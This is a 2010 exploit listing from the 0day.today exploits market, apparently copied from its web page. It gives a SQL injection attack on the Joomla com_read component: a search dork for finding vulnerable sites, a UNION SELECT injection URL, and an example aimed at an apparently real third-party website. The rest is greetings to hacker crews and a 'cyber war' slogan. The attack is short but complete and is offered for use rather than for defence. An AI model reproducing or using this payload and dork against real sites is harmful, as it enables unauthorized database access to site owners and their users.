[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_read SQL Injection Vulnerability

Author
bumble_be
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14036
Category
web applications
Date add
08-09-2010
Platform
php
=====================================================
Joomla Component com_read SQL Injection vulnerability
=====================================================

[+] Exploit Title : Joomla Component read SQL injection vulnerability
[+] Author        : bumble_be
[+] Website       : http://bumble-be.com | http://bumble-be.biz | http://linggau-haxor.com
[+] Dork          : inurl:com_read"
[+] email         : iogi89@ymail.com
[+] Tested on     : windows XP 2 ( at my warnet ) ^^



[+] Vulnerable :
http://127.0.0.1/index.php?option=com_read&task=view&id=19[c0de with y0ur brain]

[+] Exploit:
/index.php?index.php?option=com_read&task=view&id=19+AND+1=2+UNION+SELECT+1,2--

[+] Example :
http://zabaai.com/web/index.php?option=com_read&task=view&id=19+AND+1=2+UNION+SELECT+1,2--

-------------------------------------------------------------------------------------------------------------------------------------------------

[+] Thanks To and Greetz :

[+] devilzc0de.org | indonesianhacker.org | tecon-crew.org | palembanghackerlink.org |IH-CREW.net | linggau-haxor.com
[+] sikuruz, bl4ck_sh4d0w r3m1ck, otong, demnas, sudden_death, bobyhikaru, Syst3m_rt0, virgi, cah_surip, anharku, hakz, ichito_bandito, Aaezha,  
[+] flyff666, kiddies, chaer.newbie, petimati, gunslinger, mywisdom,xtr0nic, wahyu, kamtiez, MR.fribo
[+] maaf nie yg blum kesebut .. etc lah ^^"


[+] Note :

[+] We are indonesian cyber community, not only community, we are brotherhood :p
[+] ayyu sparingga, gue nunggu lo dateng.. luv u pool  ... ;-*
[+] ISLAM CYBER FOR WAR ..... ALLAHU AKBAR



#  0day.today [2024-11-16]  #